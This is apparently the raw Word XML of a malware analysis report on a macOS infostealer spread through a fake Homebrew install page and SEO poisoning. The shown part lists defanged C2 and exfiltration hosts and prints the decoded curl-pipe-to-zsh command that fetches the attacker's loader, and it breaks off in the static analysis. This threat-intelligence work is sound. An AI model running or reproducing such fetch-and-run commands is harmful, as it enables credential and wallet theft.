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0A9C" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc230012186"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Malware Analysis Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2935BC12" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fake Homebrew Installation — macOS InfoStealer</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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6414"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="08663A5D" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="511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D7CB743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48F4C13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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="3B35FE29" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="4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4D9C3DF" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Report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13C23CB" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>May 18, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="2BF45624" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="51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8F989E9" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20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82C70E9" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>InfoStealer / Credential Harvester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="476D7FE7" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="51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7995F18" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20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1E20884" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F236DB9" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="005E4570">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1330E03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sdt>
      <w:sdtPr>
        <w:id w:val="8167618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238C081" w14:textId="2107BBA7" w:rsidR="00973837" w:rsidRDefault="00973837">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="61BE075B" w14:textId="7C65306F" w:rsidR="00973837" w:rsidRDefault="00973837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0012186" w:history="1">
            <w:r w:rsidRPr="005E0280">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Malware Analysis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D08F2" w14:textId="08A03024" w:rsidR="00973837" w:rsidRDefault="0097383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012187" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280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D126B" w14:textId="7AC51262" w:rsidR="00973837" w:rsidRDefault="0097383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012188" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sample &amp; Infrastructure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858EF" w14:textId="5F1FDDB1" w:rsidR="00973837" w:rsidRDefault="0097383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012189" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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875EF" w14:textId="6A409693" w:rsidR="00973837" w:rsidRDefault="0097383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012190" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof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112A3" w14:textId="2D95316A" w:rsidR="00973837" w:rsidRDefault="0097383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012191" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Persistence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4D5A0" w14:textId="36896F97" w:rsidR="00973837" w:rsidRDefault="0097383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012192" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)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42FDE" w14:textId="55CB2E48" w:rsidR="00973837" w:rsidRDefault="0097383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012193" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK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D4232" w14:textId="272A3E46" w:rsidR="00973837" w:rsidRDefault="0097383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012194" w:history="1">
            <w:r w:rsidRPr="005E0280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E0280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15D3F" w14:textId="16DD663F" w:rsidR="00973837" w:rsidRDefault="0097383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012195" w:history="1">
            <w:r w:rsidRPr="005E0280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5E0280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DD693" w14:textId="7A32EEA2" w:rsidR="00973837" w:rsidRDefault="00973837">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="56C09226" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="6C913DCB" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="6780794C" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="7389B0C7" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="0224BC7A" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="21634280" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="6A08E0F5" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="03C68695" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="46C0D650" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="375C7F3B" w14:textId="77777777" w:rsidR="00973837" w:rsidRPr="001E1C20" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="4D351A4A" w14:textId="7A4E8E84" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc230012187"/>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="093E58AF" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>This report details the analysis of a macOS-targeting InfoStealer delivered via a fake Homebrew installation page. The threat actor leverages SEO poisoning to redirect users searching for Homebrew-related terms to a malicious website, which socially engineers them into executing a malicious terminal command. The payload performs extensive data exfiltration — including browser credentials, cryptocurrency wallet data, keychain contents, and sensitive files — while also establishing persistence and injecting malicious components into cryptocurrency wallet applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DCF636" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="005E4570">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0645C15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43AFB80" w14:textId="5D130730" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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" w:name="_Toc230012188"/>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Sample &amp; Infrastructure Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10536" w:type="dxa"/>
        <w:tblInd w:w="-5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9489"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="69D430CF" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1034"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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20EB60C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96A9B49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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="5A43A9DD" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1008"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C61679E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Delivery 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FD0D9E4" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>SEO Poisoning / Social Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="4F4F32A6" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1034"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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0D8594D" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Targeted 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6E6CCE5" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>macOS (Safari User-Agent enforced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="3CBAA79B" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1034"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C56F2C2" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Primary C2 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EABB7E6" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>ogromnistol[.]com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="55634E03" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1034"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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FBCAFDC" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Delivery 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64B380DB" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>sea-fire[.]com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="7BCF8244" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1717"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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DB4BDFA" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Domain Age (Delivery)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9E90771" w14:textId="36E5FE18" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>~28 years (likely hijacked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="0938CC71" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1717"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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62C57372" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>VirusTotal Reference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BEAC949" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="001E1C20">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.virustotal.com/gui/domain/sea-fire.comhttps://www.virustotal.com/gui/domain/sea-fire.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="1E7CF07E" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1034"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6307B323" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Stage 2 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9702660" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>hxxps://ogromnistol[.]com/debug/loader.sh?build=e743990506148cbbcc2675048e5b6f78</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="057CC236" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1717"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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A22CD6B" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exfiltration 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642F4BD3" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>hxxps://ogromnistol[.]com/api/debug/event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="5D720E0E" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1008"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E333BF4" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Staging 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E8FCB2B" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>loader.sh (Base64 encoded ZShell script)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="0724A9B7" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="1034"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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B921C54" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Temp Artifact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F55BC47" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>/tmp/shub_log.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="248F949E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0688165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4541A6" w14:textId="78FAF105" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc230012189"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Static Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="02F44564" w14:textId="286CE7EE" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Initial Delivery Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7016B6C3" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>The malicious website is hosted on sea-fire[.]com, a domain approximately 28 years old, suggesting the use of an </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expired or hijacked domain</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> to lend legitimacy and bypass age-based reputation filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E41D7" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>The site presents a convincing fake Homebrew installation page, prompting the victim to copy and paste a terminal command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0AE32" w14:textId="0BBF2DDF" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Initial Command Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28878CE2" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t xml:space="preserve">The initial command is deliberately obfuscated to hide its true intent from the victim. It begins with a benign-looking echo statement, followed by the actual malicious payload — </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:lastRenderedPageBreak/>
        <w:t>a </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Base64-encoded string</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> that, when decoded, issues a curl request to retrieve the next stage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07340332" w14:textId="4F312509" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="00A90BD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B66BB6A" wp14:editId="07D1C463">
            <wp:extent cx="5943600" cy="2904490"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="72962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20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1855" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
    <w:p w14:paraId="304F9130" w14:textId="7781BB58" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="00A90BD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46FD282A" wp14:editId="53F966B2">
            <wp:extent cx="5943600" cy="959485"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="105956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60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68ED" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
    <w:p w14:paraId="73346FF9" w14:textId="733E36DF" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t>ash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1C20" w14:paraId="4C94ECD7" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D07126A" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001E1C20">
              <w:t># Decoded command resolves to:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="335A2AD9" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001E1C20">
              <w:t>curl hxxps://ogromnistol[.]com/debug/loader.sh?build=e743990506148cbbcc2675048e5b6f78 | zsh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="422CD284" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48D4A69F" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
    <w:p w14:paraId="76D33C55" w14:textId="4E8E4165" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Stage 2 — loader.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE7407" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>The retrieved loader.sh is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ZShell script</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> with the following notable static characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457600A4" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Contains a </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Russian keyboard layout check</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> (anti-analysis / targeting filter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B037416" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:lastRenderedPageBreak/>
        <w:t>References a remote osascript payload hosted on the C2 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E894809" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Contains telemetry collection logic (keyboard layouts, public IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639D4527" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>All meaningful logic is Base64 encoded to hinder static analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DEC606" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
